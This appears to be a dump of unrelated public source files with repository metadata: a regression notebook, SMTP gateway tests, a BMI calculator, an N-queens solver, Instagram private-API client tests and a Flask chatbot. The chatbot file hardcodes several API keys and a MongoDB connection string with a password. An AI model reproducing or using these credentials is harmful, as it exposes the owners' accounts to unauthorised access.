print(f"Player attribute load failed: {e}")
raise
person_elem = element.find("person")
person = PersonDc.from_element(person_elem)
profile_elem = element.find("profile")
profile = ProfileDc.from_element(profile_elem)
return cls(hash_=hash_, rid=rid, person=person, profile=profile)
|
[
"david.wm.sanders@gmail.com"
] |
david.wm.sanders@gmail.com
|
12fc0ee1166b4df4407683936d693911b1337cb8
|
df519fcb24870f66c57ac758237eb65e1cc41243
|
/Initial testing - TB1/OB - 011220 UK Household Data Manipulation - Linear Regression Using Scikit learn.py.html
|
818cb73e5508b38ff5a0c9e2e5410ecfb303e4a9
|
[] |
no_license
|
EMAT31530/green-team-repo-2
|
dfb7f12426fb5ea96caef0e4b9d02786edef7986
|
cf41da2e2f4567cd58b7f160a2ac626a6ab97541
|
refs/heads/main
| 2023-08-07T15:53:31.673435
| 2021-04-15T14:15:30
| 2021-04-15T14:15:30
| 342,831,903
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,843
|
html
|
#!/usr/bin/env python
# coding: utf-8
# In[28]:
# create a dataframe to pull out the data as required
import pandas as pd
import numpy as np
Household_Spend = pd.read_csv('UK_Household_Quantity2.csv', header=None)
Household_Spend
# In[29]:
#Pull required data
Milk = Household_Spend.iloc[1,6:51].values
# In[30]:
Milk = np.reshape(Milk, (45, 1))
Milk = Milk.astype(np.int32)
Milk
# In[31]:
#Pull yearly data
Year = Household_Spend.iloc[0,6:51].values
Year = np.reshape(Year, (45, 1))
Year = Year.astype(np.int32)
Year
# In[32]:
get_ipython().run_line_magic('matplotlib', 'inline')
import matplotlib.pyplot as plt
# for a scatter plot...
plt.scatter(Year, Milk)
plt.xlabel('Year')
plt.ylabel('Weekly Milk Demand (ml)')
plt.show()
# In[33]:
import numpy as np
Year = np.hstack((np.ones(shape=(len(Year), 1)), Year))
Year
# In[34]:
Year.T
# $$(\mathbf{X}^T\mathbf{X})^{-1} \mathbf{X}^T\mathbf{y}$$
# In[35]:
# ls is the least-squares estimate
ls = np.linalg.inv(Year.T.dot(Year)).dot(Year.T).dot(Milk)
ls
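# a numerically stabler equivalent, assuming the same Year/Milk arrays:
# ls, *_ = np.linalg.lstsq(Year, Milk, rcond=None)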
# In[36]:
# predictions = features dot the least-squares estimate
Milk_hat = Year.dot(ls)
Milk_hat
# In[37]:
# mean squared error - for numpy we need to flatten our array
mse = np.mean((Milk.flatten() - Milk_hat) **2)
mse
# In[38]:
plt.plot(Year[:,1], Milk_hat, c='g', label='Model') # as we are using yhat these are our predictions - green line of model
plt.scatter(Year[:,1], Milk, c='b', label='Data') # this is our actual data
plt.legend(loc='best')
plt.xlabel('Year')
plt.ylabel('Milk Demand (ml)')
plt.show()
# In[25]:
# Now we predict milk demand based on year
#new_Year = np.array([[1, 2025], [1, 2030]])
#new_Milk_hat = new_Year.dot(ls)
#new_Milk_hat
# In[26]:
# commented out: it would append the two new data points and so would not allow us to redo the linear regression in scikit-learn below
#plt.scatter(Year[:,1], Milk, c='b', label='Data')
#Year = np.concatenate((Year, new_Year)) # adding the new points to the old data so that we have one array.
#Milk_hat = np.concatenate((Milk_hat, new_Milk_hat)) #same as line above
#plt.plot(Year[:,1], Milk_hat, c='g', label='Model')
#plt.scatter(new_Year[:,1], new_Milk_hat, c='r')
#plt.legend(loc='best')
#plt.xlabel('Year')
#plt.ylabel('Milk Demand (ml)')
#plt.show()
# In[39]:
# this is how we normally implement linear regression
from sklearn.linear_model import LinearRegression
regr = LinearRegression().fit(Year[:,1].reshape(-1, 1), Milk) # fit and predict
# In[40]:
Milk_hat = regr.predict(Year[:,1].reshape(-1, 1)) # predictions made by sklearn rather than the linear regression
# In[41]:
plt.scatter(Year[:,1], Milk, c='b', label='Data')
plt.plot(Year[:,1], Milk_hat, c='g', label='Model')
plt.legend(loc='best')
plt.xlabel('Year')
plt.ylabel('Milk Demand (ml)')
plt.show()
# In[ ]:
# In[ ]:
|
[
"73698372+HannahSpurgeon@users.noreply.github.com"
] |
73698372+HannahSpurgeon@users.noreply.github.com
|
52e13ff11f44e8a73d5997977c6a8554d65d0732
|
6b6aae84763c7ad7ad4585d8410007e383ed41fb
|
/test/test.py
|
257e4ee05227908376ffc5a24a656c3a18b6828f
|
[] |
no_license
|
PowerMeMobile/email2sms
|
b3f9781c83f0081c809db4509bca1665a4c72529
|
f4b67b49326b576d53c160393b334559509f72c6
|
refs/heads/master
| 2020-05-26T07:47:26.383983
| 2015-12-08T12:34:25
| 2015-12-08T12:34:25
| 25,347,909
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,839
|
py
|
# -*- coding: utf-8 -*-
import pytest
import os
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
EMAIL_HOST = os.getenv('EMAIL_HOST')
if EMAIL_HOST == None or EMAIL_HOST == '':
EMAIL_HOST = '127.0.0.1'
EMAIL_PORT = os.getenv('EMAIL_PORT')
if EMAIL_PORT == None or EMAIL_PORT == '':
EMAIL_PORT = '2525'
AUTH_FROM_ADDR = 'email-postpaid@mail.com'
AUTH_FROM_ADDR_BAD = 'd.klionsky@dev1team.net'
AUTH_FROM_ADDR_USER_NO_EMAIL_IF = 'email_no_email_if-postpaid@mail.com'
AUTH_SUBJECT = '10009:user:password'
AUTH_SUBJECT_BAD = 'bad auth subject'
AUTH_SUBJECT_BAD_PASSWORD = '10009:user:bad_password'
AUTH_TO_ADDR = '375296660009@mail.com'
AUTH_TO_ADDR_NOT_ALLOWED = '375296660019@mail.com'
AUTH_TO_ADDR_BAD = 'bad_number@mail.com'
TO = '375296543210@mail.com'
TO2 = ['375296543210@mail.com', '375296543211@mail.com']
TO3 = ['375296543210@mail.com', '375296543211@mail.com', '375296543212@mail.com']
TO4 = ['375296543210@mail.com', '375296543211@mail.com', '375296543212@mail.com', '375296543212@mail.com']
TO2_BAD_DOMAINS = ['375296543210@mail2.com', '375296543211@mail2.com']
TO2_BAD_COVERAGE = ['888296543210@mail.com', '888296543211@mail.com']
@pytest.fixture
def smtp():
smtp = smtplib.SMTP(EMAIL_HOST, EMAIL_PORT)
resp, _msg = smtp.ehlo()
assert resp == 250
return smtp
#
# Utils
#
def sendmail(smtp, f, t, msg):
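    # smtplib.sendmail returns {} when every recipient is accepted; a rejected
    # DATA command raises SMTPDataError, which we unpack into (code, message)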
try:
return smtp.sendmail(f, t, msg)
except smtplib.SMTPDataError as (code, resp):
return (code, resp)
#
# Auth schemes
#
def test_auth_from_address_succ(smtp):
msg = MIMEText('from_address test')
msg['From'] = AUTH_FROM_ADDR
msg['To'] = TO
res = sendmail(smtp, msg['From'], TO, msg.as_string())
assert {} == res
def test_auth_from_address_fail(smtp):
msg = MIMEText('from_address test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = TO
(code, resp) = sendmail(smtp, msg['From'], TO, msg.as_string())
assert code == 550
assert resp == 'Invalid user account'
def test_auth_from_address_user_no_email_if_fail(smtp):
msg = MIMEText('from_address test')
msg['From'] = AUTH_FROM_ADDR_USER_NO_EMAIL_IF
## both subject and to_address auth are valid.
## the test should fail nonetheless because customer is found,
## but doesn't have email interface
msg['To'] = AUTH_TO_ADDR
msg['Subject'] = AUTH_SUBJECT
(code, resp) = sendmail(smtp, msg['From'], TO, msg.as_string())
assert code == 550
assert resp == 'Invalid user account'
def test_auth_subject_succ(smtp):
msg = MIMEText('subject test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = TO
msg['Subject'] = AUTH_SUBJECT
res = sendmail(smtp, msg['From'], TO, msg.as_string())
assert {} == res
def test_auth_subject_bad_subject_fail(smtp):
msg = MIMEText('subject test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = TO
msg['Subject'] = AUTH_SUBJECT_BAD
(code, resp) = sendmail(smtp, msg['From'], TO, msg.as_string())
assert code == 550
assert resp == 'Invalid user account'
def test_auth_subject_bad_password_fail(smtp):
## to_address auth is valid.
## the test should fail nonetheless because customer is found,
## but the password is wrong
msg = MIMEText('subject test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = AUTH_TO_ADDR
msg['Subject'] = AUTH_SUBJECT_BAD_PASSWORD
(code, resp) = sendmail(smtp, msg['From'], TO, msg.as_string())
assert code == 550
assert resp == 'Invalid user account'
def test_auth_to_address_succ(smtp):
msg = MIMEText('to_address test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = AUTH_TO_ADDR
res = sendmail(smtp, msg['From'], AUTH_TO_ADDR, msg.as_string())
assert {} == res
def test_auth_to_address_fail(smtp):
msg = MIMEText('to_address test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = AUTH_TO_ADDR_BAD
(code, resp) = sendmail(smtp, msg['From'], AUTH_TO_ADDR_BAD, msg.as_string())
assert code == 550
assert resp == 'Invalid user account'
def test_auth_to_address_no_allowed_fail(smtp):
msg = MIMEText('to_address test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = AUTH_TO_ADDR_NOT_ALLOWED
(code, resp) = sendmail(smtp, msg['From'], AUTH_TO_ADDR_NOT_ALLOWED, msg.as_string())
assert code == 550
assert resp == 'Invalid user account'
#
# MIME content types
#
# raw text
def test_raw_text_us_ascii_succ(smtp):
msg = """\
From: %s
To: %s
Subject: %s
%s
""" % (AUTH_FROM_ADDR_BAD, TO, AUTH_SUBJECT, 'raw text us-ascii')
res = sendmail(smtp, AUTH_FROM_ADDR_BAD, TO, msg)
assert {} == res
def test_text_plain_us_ascii_succ(smtp):
msg = MIMEText('text plain us-ascii')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = TO
msg['Subject'] = AUTH_SUBJECT
res = sendmail(smtp, msg['From'], TO, msg.as_string())
assert {} == res
def test_text_plain_utf_8_succ(smtp):
msg = MIMEText('Привет, как дела?', _charset='utf-8')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = TO
msg['Subject'] = AUTH_SUBJECT
res = sendmail(smtp, msg['From'], TO, msg.as_string())
assert {} == res
def test_text_html_succ(smtp):
html = """\
<html>
<head></head>
<body>
<p>text %2F html</p>
</body>
</html>
"""
msg = MIMEText(html, 'html')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = TO
msg['Subject'] = AUTH_SUBJECT
res = sendmail(smtp, msg['From'], TO, msg.as_string())
assert {} == res
def test_multipart_alternative_succ(smtp):
msg = MIMEMultipart('multipart alternative')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = TO
msg['Subject'] = AUTH_SUBJECT
text = "text/alternative text"
html = """\
<html>
<head></head>
<body>
<p>text/alternative html</p>
</body>
</html>
"""
part1 = MIMEText(text, 'plain')
part2 = MIMEText(html, 'html')
msg.attach(part1)
msg.attach(part2)
res = sendmail(smtp, msg['From'], TO, msg.as_string())
assert {} == res
def test_multipart_mixed_succ(smtp):
msg = MIMEMultipart()
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = TO
msg['Subject'] = AUTH_SUBJECT
msg.attach(MIMEText('multipart mixed'))
res = sendmail(smtp, msg['From'], TO, msg.as_string())
assert {} == res
#
# Filter by domains
#
def test_filter_by_domains_2_ok_succ(smtp):
msg = MIMEText('filter by domain test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = ','.join(TO2)
msg['Subject'] = AUTH_SUBJECT
res = sendmail(smtp, msg['From'], TO2, msg.as_string())
assert {} == res
def test_filter_by_domains_2_bad_fail(smtp):
msg = MIMEText('filter by domain test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = ','.join(TO2_BAD_DOMAINS)
msg['Subject'] = AUTH_SUBJECT
(code, resp) = sendmail(smtp, msg['From'], TO2_BAD_DOMAINS, msg.as_string())
assert code == 550
assert resp == 'No valid recipients found'
# assumes invalid_recipient_policy == reject_message
def test_filter_by_domains_2_ok_2_bad_fail(smtp):
msg = MIMEText('filter by domain test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = ','.join(TO2 + TO2_BAD_DOMAINS)
msg['Subject'] = AUTH_SUBJECT
(code, resp) = sendmail(smtp, msg['From'], TO2 + TO2_BAD_DOMAINS, msg.as_string())
assert code == 550
assert resp == 'Rejected by invalid recipient policy'
#
# Filter by coverage
#
def test_filter_by_coverage_3_ok_succ(smtp):
msg = MIMEText('filter by coverage test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = ','.join(TO3)
msg['Subject'] = AUTH_SUBJECT
res = sendmail(smtp, msg['From'], TO3, msg.as_string())
assert {} == res
# assumes smtp_max_recipient_count == 3
def test_filter_by_coverage_4_ok_fail(smtp):
msg = MIMEText('filter by coverage test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = ','.join(TO4)
msg['Subject'] = AUTH_SUBJECT
(code, resp) = sendmail(smtp, msg['From'], TO4, msg.as_string())
assert code == 550
assert resp == 'Too many recipients specified'
def test_filter_by_coverage_2_bad_fail(smtp):
msg = MIMEText('filter by coverage test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = ','.join(TO2_BAD_COVERAGE)
msg['Subject'] = AUTH_SUBJECT
(code, resp) = sendmail(smtp, msg['From'], TO2_BAD_COVERAGE, msg.as_string())
assert code == 550
assert resp == 'No valid recipients found'
# assumes invalid_recipient_policy == reject_message
def test_filter_by_coverage_2_ok_2_bad_fail(smtp):
msg = MIMEText('filter by coverage test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = ','.join(TO2 + TO2_BAD_COVERAGE)
msg['Subject'] = AUTH_SUBJECT
(code, resp) = sendmail(smtp, msg['From'], TO2 + TO2_BAD_COVERAGE, msg.as_string())
assert code == 550
assert resp == 'Rejected by invalid recipient policy'
#
# Message content
#
# assumes max_msg_parts == 10
def test_10_msg_parts_succ(smtp):
msg = MIMEText('Very Long Message ' * 85)
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = TO
msg['Subject'] = AUTH_SUBJECT
res = sendmail(smtp, msg['From'], TO, msg.as_string())
assert {} == res
# assumes max_msg_parts == 10
def test_11_msg_parts_fail(smtp):
msg = MIMEText('Very Long Message ' * 86)
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = TO
msg['Subject'] = AUTH_SUBJECT
(code, resp) = sendmail(smtp, msg['From'], TO, msg.as_string())
assert code == 550
assert resp == 'Too many SMS parts'
#
# Internal error
#
def test_internal_error_succ(smtp):
msg = MIMEText('internal error test')
msg['From'] = AUTH_FROM_ADDR_BAD
msg['To'] = '; '.join(TO2)
msg['Subject'] = AUTH_SUBJECT
(code, resp) = sendmail(smtp, msg['From'], TO2, msg.as_string())
assert code == 554
assert resp == 'Internal server error'
|
[
"dm.klionsky@gmail.com"
] |
dm.klionsky@gmail.com
|
19bf5a6e61dce3b350f0d1e8f5096e10c43332a4
|
9c8e0321a4c3a6d072babc34b94a6101e1ea3d11
|
/main.py
|
7da6e1d614f163173724701adb57f161b8d2ae6d
|
[] |
no_license
|
sebekbr/bmi_calculator
|
1714b074c3afc45f61fa01a9e9adffa22bf33b74
|
dcf7f6c3f6011a82b797c2fc990aaa99688aca9e
|
refs/heads/master
| 2020-12-11T20:32:38.081179
| 2020-01-14T22:58:28
| 2020-01-14T22:58:28
| 233,952,247
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 771
|
py
|
print("KALKULATOR BMI")
print("~~~~~~~~~~~~~~")
print("Podaj wymagane dane. Pamiętaj aby zamiast przecinka (,) stosować kropkę (.)")
height = input("Podaj wzrost w [m]: ")
weight = input("Podaj wagę w [kg]: ")
# convert the strings to floats
floatHeight = float(height)
floatWeight = float(weight)
bmi = floatWeight / (floatHeight * floatHeight)
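# BMI = weight [kg] / height [m]^2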
print(round(bmi, 2))  # round() rounds the number to two decimal places
# half-open ranges cover every BMI value without gaps
if bmi < 18.5:
    print("Niedowaga!")
elif bmi < 25:
    print("Waga normalna")
elif bmi < 30:
    print("Nadwaga")
elif bmi < 35:
    print("Otyłość 1 stopnia")
elif bmi < 40:
    print("Otyłość 2 stopnia")
else:
    print("Otyłość 3 stopnia")
|
[
"sebastian.brodziak@gmail.com"
] |
sebastian.brodziak@gmail.com
|
5173078daff12784dc95130aa7fa752675945ff6
|
0fc95286ad73a7e9f2747f669d67057a5c7f1269
|
/tests/private/client.py
|
8511546470bb1403853176586d015028bd8f56b0
|
[
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] |
permissive
|
hideki-saito/instagram_private_api
|
d1105186dc620e9f1402d03e0bd829fcc0742eaa
|
3b394dfc183125a4dddd5e33345b49aa29a687fc
|
refs/heads/master
| 2021-01-21T21:06:14.461071
| 2017-06-13T15:08:10
| 2017-06-13T15:08:10
| 94,777,003
| 5
| 0
| null | 2017-06-19T12:59:08
| 2017-06-19T12:59:08
| null |
UTF-8
|
Python
| false
| false
| 9,394
|
py
|
from io import BytesIO
import json
from ..common import (
ApiTestBase, Client, ClientThrottledError, ClientError, ClientLoginRequiredError, Constants,
gen_user_breadcrumb, max_chunk_size_generator, max_chunk_count_generator,
compat_mock, compat_urllib_error
)
class ClientTests(ApiTestBase):
"""Tests for general Client functions (not endpoint specific)."""
@staticmethod
def init_all(api):
return [
{
'name': 'test_validate_useragent',
'test': ClientTests('test_validate_useragent', api)
},
{
'name': 'test_validate_useragent2',
'test': ClientTests('test_validate_useragent2', api)
},
{
'name': 'test_generate_useragent',
'test': ClientTests('test_generate_useragent', api)
},
{
'name': 'test_cookiejar_dump',
'test': ClientTests('test_cookiejar_dump', api)
},
{
'name': 'test_gen_user_breadcrumb',
'test': ClientTests('test_gen_user_breadcrumb', api)
},
{
'name': 'test_max_chunk_size_generator',
'test': ClientTests('test_max_chunk_size_generator', api)
},
{
'name': 'test_max_chunk_count_generator',
'test': ClientTests('test_max_chunk_count_generator', api)
},
{
'name': 'test_settings',
'test': ClientTests('test_settings', api)
},
{
'name': 'test_user_agent',
'test': ClientTests('test_user_agent', api)
},
{
'name': 'test_client_properties',
'test': ClientTests('test_client_properties', api)
},
{
'name': 'test_client_loginrequired',
'test': ClientTests('test_client_loginrequired', api)
},
{
'name': 'test_client_requests',
'test': ClientTests('test_client_requests', api)
},
]
def test_validate_useragent(self):
self.sleep_interval = 0
ua = 'Instagram 9.2.0 Android (22/5.1.1; 480dpi; 1080x1920; Xiaomi; Redmi Note 3; kenzo; qcom; en_GB)'
results = Client.validate_useragent(ua)
self.assertEqual(results['parsed_params']['brand'], 'Xiaomi')
self.assertEqual(results['parsed_params']['device'], 'Redmi Note 3')
self.assertEqual(results['parsed_params']['model'], 'kenzo')
self.assertEqual(results['parsed_params']['resolution'], '1080x1920')
self.assertEqual(results['parsed_params']['dpi'], '480dpi')
self.assertEqual(results['parsed_params']['chipset'], 'qcom')
self.assertEqual(results['parsed_params']['android_version'], 22)
self.assertEqual(results['parsed_params']['android_release'], '5.1.1')
self.assertEqual(results['parsed_params']['app_version'], '9.2.0')
def test_validate_useragent2(self):
self.sleep_interval = 0
ua = 'Instagram 9.2.0 Android (xx/5.1.1; 480dpi; 1080x1920; Xiaomi; Redmi Note 3; kenzo; qcom; en_GB)'
with self.assertRaises(ValueError):
Client.validate_useragent(ua)
def test_generate_useragent(self):
self.sleep_interval = 0
custom_device = {
'manufacturer': 'Samsung',
'model': 'maguro',
'device': 'Galaxy Nexus',
'android_release': '4.3',
'android_version': 18,
'dpi': '320dpi',
'resolution': '720x1280',
'chipset': 'qcom'
}
custom_ua = Client.generate_useragent(
android_release=custom_device['android_release'],
android_version=custom_device['android_version'],
phone_manufacturer=custom_device['manufacturer'],
phone_device=custom_device['device'],
phone_model=custom_device['model'],
phone_dpi=custom_device['dpi'],
phone_resolution=custom_device['resolution'],
phone_chipset=custom_device['chipset']
)
self.assertEqual(
custom_ua,
'Instagram %s Android (%s/%s; %s; %s; '
'%s; %s; %s; %s; en_US)'
% (
Constants.APP_VERSION,
custom_device['android_version'],
custom_device['android_release'],
custom_device['dpi'],
custom_device['resolution'],
custom_device['manufacturer'],
custom_device['device'],
custom_device['model'],
custom_device['chipset'],
)
)
def test_cookiejar_dump(self):
self.sleep_interval = 0
dump = self.api.cookie_jar.dump()
self.assertIsNotNone(dump)
def test_gen_user_breadcrumb(self):
self.sleep_interval = 0
output = gen_user_breadcrumb(15)
self.assertIsNotNone(output)
def test_max_chunk_size_generator(self):
self.sleep_interval = 0
chunk_data = 'abcdefghijklmnopqrstuvwxyz'
chunk_size = 5
chunk_count = 0
for chunk_info, data in max_chunk_size_generator(chunk_size, chunk_data):
chunk_count += 1
self.assertIsNotNone(data, 'Empty chunk.')
self.assertLessEqual(len(data), chunk_size, 'Chunk size is too big.')
self.assertEqual(len(data), chunk_info.length, 'Chunk length is wrong.')
self.assertEqual(chunk_info.is_first, chunk_count == 1)
def test_max_chunk_count_generator(self):
self.sleep_interval = 0
chunk_data = 'abcdefghijklmnopqrstuvwxyz'
expected_chunk_count = 5
chunk_count = 0
for chunk_info, data in max_chunk_count_generator(expected_chunk_count, chunk_data):
chunk_count += 1
self.assertIsNotNone(data, 'Empty chunk.')
self.assertEqual(len(data), chunk_info.length, 'Chunk length is wrong.')
self.assertEqual(chunk_info.is_first, chunk_count == 1)
self.assertEqual(chunk_info.is_last, chunk_count == expected_chunk_count)
self.assertEqual(chunk_count, expected_chunk_count, 'Chunk count is wrong.')
def test_settings(self):
self.sleep_interval = 0
results = self.api.settings
for k in ('uuid', 'device_id', 'ad_id', 'cookie', 'created_ts'):
self.assertIsNotNone(results.get(k))
def test_user_agent(self):
self.sleep_interval = 0
ua = self.api.user_agent
self.assertIsNotNone(ua)
self.api.user_agent = ua
def test_ua_setter():
self.api.user_agent = 'Agent X'
self.assertRaises(ValueError, test_ua_setter)
custom_ua = self.api.generate_useragent(phone_manufacturer='BrandX')
self.assertTrue('BrandX' in custom_ua)
results = self.api.validate_useragent(custom_ua)
self.assertEqual(results['parsed_params']['brand'], 'BrandX')
def test_client_properties(self):
self.sleep_interval = 0
results = self.api.get_cookie_value('non-existent-cookie-value')
self.assertIsNone(results)
self.assertIsNotNone(self.api.csrftoken)
self.assertIsNotNone(self.api.token)
self.assertIsNotNone(self.api.authenticated_user_id)
self.assertIsNotNone(self.api.authenticated_user_name)
self.assertIsNotNone(self.api.rank_token)
self.assertIsNotNone(self.api.phone_id)
self.assertIsNotNone(self.api.radio_type)
self.assertIsNotNone(self.api.generate_deviceid())
self.assertIsInstance(self.api.timezone_offset, int)
def test_client_loginrequired(self):
self.sleep_interval = 0
with self.assertRaises(ClientLoginRequiredError):
Client('', '')
@compat_mock.patch('instagram_private_api.client.compat_urllib_request.OpenerDirector.open')
def test_client_requests(self, open_mock):
self.sleep_interval = 0
open_mock.side_effect = [
compat_urllib_error.HTTPError(
'', 400, 'Bad Request', {},
BytesIO(json.dumps({'status': 'fail', 'message': 'login_required'}).encode('ascii'))),
compat_urllib_error.HTTPError(
'', 429, 'Too Many Requests', {},
BytesIO(
json.dumps({
'status': 'fail',
'message': 'Sorry, too many requests. Please try again later.'}
).encode('ascii')
)),
compat_urllib_error.HTTPError(
'', 500, 'Internal Server Error', {},
BytesIO('Internal Server Error'.encode('ascii'))),
]
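        # the three queued HTTPErrors are consumed in order, one per
        # feed_timeline() call below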
with self.assertRaises(ClientLoginRequiredError) as ce:
self.api.feed_timeline()
self.assertEqual(ce.exception.msg, 'login_required')
with self.assertRaises(ClientThrottledError) as ce:
self.api.feed_timeline()
self.assertEqual(ce.exception.msg, 'Sorry, too many requests. Please try again later.')
with self.assertRaises(ClientError) as ce:
self.api.feed_timeline()
self.assertEqual(ce.exception.msg, 'Internal Server Error')
|
[
"lastmodified@gmail.com"
] |
lastmodified@gmail.com
|
a3853066e56c3628542df630bc034da0c0909f0e
|
149660428ec7570b02b9e8b3d494dcd548e80005
|
/01-04_python基础/02_branch/hm_06_holiday_of_girlfrieds.py
|
04fdf021fc6b462b2d0aa25d6ca816e1270e5888
|
[] |
no_license
|
kenzzuli/hm_15
|
603eb178e476f946eb57b1cdf0c85ba5d65e8d58
|
db8a6d13776e55aa4e05ff9f39e9c8e98d59d8ee
|
refs/heads/master
| 2023-08-07T01:57:01.993474
| 2021-09-23T15:49:19
| 2021-09-23T15:49:19
| 359,322,831
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 561
|
py
|
"""
1. 定义 `holiday_name` 字符串变量记录节日名称
2. 如果是 **情人节** 应该 **买玫瑰**/**看电影**
3. 如果是 **平安夜** 应该 **买苹果**/**吃大餐**
4. 如果是 **生日** 应该 **买蛋糕**
5. 其他的日子每天都是节日啊……
"""
holiday_name = input("please input a holiday:")
if holiday_name == "valentine's day":
print("buy roses")
elif holiday_name == "holloween eve":
print("buy apple")
elif holiday_name == "birthday":
print("buy cake")
else:
print("everyday is a holiday with her")
|
[
"820710063@qq.com"
] |
820710063@qq.com
|
9c3ee945c6fece715afb3662a97ce6713662f1dc
|
0f9888879a1d7b23d51bbca539be94ce26e37360
|
/lab5/n_queen_bfs.py
|
4adb7481ff6d253e1da1e8fe2b23bf8f9903e369
|
[] |
no_license
|
singhpratyush/intro-to-ai
|
034ad69ab3a4dd6ea848d582e06cfd53c2962187
|
04eb3236147e882a3c666fe7f3425e15086fbb23
|
refs/heads/master
| 2021-01-19T22:08:40.256641
| 2017-04-19T19:05:27
| 2017-04-19T19:05:27
| 88,758,950
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,504
|
py
|
import numpy
import sys
sys.path.append('.')
from Lab5.bfs import BreadthFirstSearch
class NQueenBFS(BreadthFirstSearch):
def __init__(self, n):
super().__init__()
self.n = n
self.dim = [n, n]
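        # a state is the n x n board flattened into a tuple of 0/1 cells
        # (1 marks a queen); tuples keep states hashable for the BFS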
def is_final(self, node):
node = numpy.array(node).reshape(self.dim)
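        # note: .diagonal() is only the main diagonal; anti-diagonals and
        # offset diagonals are not checked here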
if sum(node.diagonal()) > 1:
return False
for i in range(self.n):
if sum(node[:, i]) > 1:
return False
if sum(node[i, :]) > 1:
return False
return True
def get_adjacent(self, node):
node = numpy.array(node).reshape(self.dim)
queen_pos = numpy.where(node == 1)
for i in range(self.n):
curr_queen = queen_pos[0][i], queen_pos[1][i]
            # try all 8 single-step moves: L, LB, B, RB, R, RT, T, LT
            for dr, dc in [(-1, 0), (-1, 1), (0, 1), (1, 1),
                           (1, 0), (1, -1), (0, -1), (-1, -1)]:
                new = curr_queen[0] + dr, curr_queen[1] + dc
                if 0 <= new[0] < self.n and 0 <= new[1] < self.n and node[new] == 0:
                    temp = node.copy()
                    temp[curr_queen], temp[new] = 0, 1
                    yield tuple(temp.ravel().tolist())
def main():
n = 5
nqp = NQueenBFS(n)
root = tuple([1]*n + [0]*(n-1)*n)
nqp.add_node(root)
result = nqp.traverse()
print(result[0])
print(result[2])
if __name__ == '__main__':
main()
|
[
"singh.pratyush96@gmail.com"
] |
singh.pratyush96@gmail.com
|
075d3a7bd30b85a1f1308e0e2336175b386a5fd9
|
ab31559f47b62bda09acf06c62beef4e5c0c546a
|
/app.py
|
843ea54ab77eded8e42228f89fb5e51372841cee
|
[] |
no_license
|
saikumar1752/Chatbot1752
|
737a0f4616edde31ee4747b8876f36e06c2baaa8
|
058298f44b4b9df496e54d40a5aacee3cee48e2a
|
refs/heads/main
| 2023-05-08T05:49:54.421878
| 2021-05-22T04:58:47
| 2021-05-22T04:58:47
| 369,306,325
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,785
|
py
|
import random
import json
import pprint
import nlpcloud
from pymongo import MongoClient
from flask import Flask, jsonify, request
from flask_cors import CORS, cross_origin
app=Flask(__name__)
CORS(app, support_credentials=True)
nlpapis=[
"2df4083aa8e71c45a1913a6abee1b5e443dbfdbc",
"66f926e21f3160c7c917d9d4ef312947250284b6",
"8833df5d4ff304cf054bbb88b0f767e3ca79c8ba",
"537843dc93cf606b3f52e1fd34ef898965811ae1",
"1b4c8ca0c19046a56cd1301324a0c6bb278727ed",
"573a02b5e157fb2c5f50eb2a0e1480650da65d4b"
]
length=len(nlpapis)
nlpclients=[]
for x in nlpapis:
nlpclients.append(nlpcloud.Client("roberta-base-squad2", x))
client = MongoClient("mongodb+srv://abhisekkumar:passcode23@internproject-zscmu.mongodb.net/Airbus?retryWrites=true&w=majority")
db=client.ChatbotMessages.Messages
count=0
@app.route("/", methods=["GET", "POST"])
@cross_origin(supports_credentials=True)
def hello_world():
global count
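    # rotate round-robin through the NLP Cloud clients so the question load
    # is spread across the available API keys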
store=nlpclients[count]
count=(count+1)%length
lol=request.data.decode('UTF-8')
obj=json.loads(lol)
question=obj['message']
subjects=db.find()
answers=[]
store_content=[]
for x in subjects:
if "question" in x :
if question==x["question"]:
return jsonify(fulfillmentText=x['answer'])
elif "content" in x:
store_content.append(x["content"])
for x in store_content:
nplmessage=store.question(x, question)
answers.append([nplmessage["answer"], nplmessage["score"]])
answers.sort(reverse=True, key=lambda x :x[1])
if answers[0][1]<0.3:
answer=db.find({"dummy":"true"})
store=[]
for x in answer:
store.append(x["message"])
store=store[0]
return jsonify(fulfillmentText=store)
return jsonify(fulfillmentText=answers[0][0])
if __name__=='__main__':
app.run(debug=True)
|
[
"noreply@github.com"
] |
saikumar1752.noreply@github.com
|
35bcd44d6c3ffc36f3c53e1a5856f2b17256a861
|
2780b5d138af6733a20913baaeebc0c4f235cbee
|
/bikeax/wsgi.py
|
869504948d4e574fa4c9c639af5e372d88445279
|
[] |
no_license
|
ccsreenidhin/Django-Ecom
|
b74c47345bd883aa41d35ddc5cc4bc8da4270999
|
b27a42cecf91ae8f3f4ccb0e07717be6a6c98ba5
|
refs/heads/master
| 2022-10-24T02:20:58.059523
| 2017-10-07T18:17:10
| 2020-06-13T05:48:47
| 271,949,105
| 0
| 0
| null | null | null | null |
